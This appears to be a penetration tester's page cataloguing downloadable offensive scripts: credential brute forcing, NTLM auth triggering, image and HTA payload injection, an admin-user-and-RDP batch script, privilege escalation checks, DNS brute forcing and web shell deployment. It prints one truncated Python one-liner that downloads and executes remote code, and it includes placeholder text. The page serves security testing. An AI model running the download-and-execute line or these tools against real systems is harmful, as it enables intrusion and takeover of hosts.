
Scripts and Code Snippets

Stand-Alone Exploits


PS used to brute-force SIDs and user credentials, execute queries, and trigger NTLM auth attempts against a target.  Download

Image Payload Injection:
 - Injecting PS into a BMP image   Download

 - Injecting payloads into JPG image    Download

Python 1-Line Download/Exec: - python -c 'import urllib2;r=urllib2.urlopen("");exec('

Pre-Built Containers for Payloading

Generic HTA container

Generic container for altering - includes launcher carve out. Download

Shell Code Assistance:
Shell Code Parser and Documenter:

PS / Bash / PY /WSH / VB Scripts

Bash - Entity Enum Script

Various enum collections against tgt domain and IP range. Download

Win Batch - Add User.bat
Scripted commands to add a specified user and associated password to the local host, move the user to the Admins group, and start / open RDP (incl. FW hole).  Download

Linux Local Privs Checker / Escalation Tool
Script runs on local Linux hosts, enumerates world-writable spaces, and checks for common escalation options. Download

Bash - Weak SSL Detection Script

Loops through a target listing of domains searching for weak SSL ciphers  Download

Bash - DNS Dump

Brute forces DNS lookup against a domain using the 120+ most common host names (usage: -x {domain.tld} )  Download

Bash -

Scripted nmap scan for Expected Eyewitness ports | results to Eyewitness  Download

MSF Go-To Exploits

Sample xxxx Code

This code does stuff. Download

Tools and Job Aids

nmap XML --> Reporting

Converts nmap.xml files into a format Access can import and generate canned reports from. Download

Creating A Scheduled Task via CLI     Download 

Deploying Web Shells
Resources and example guide for simple web shell deployments

Pentest-Zen (
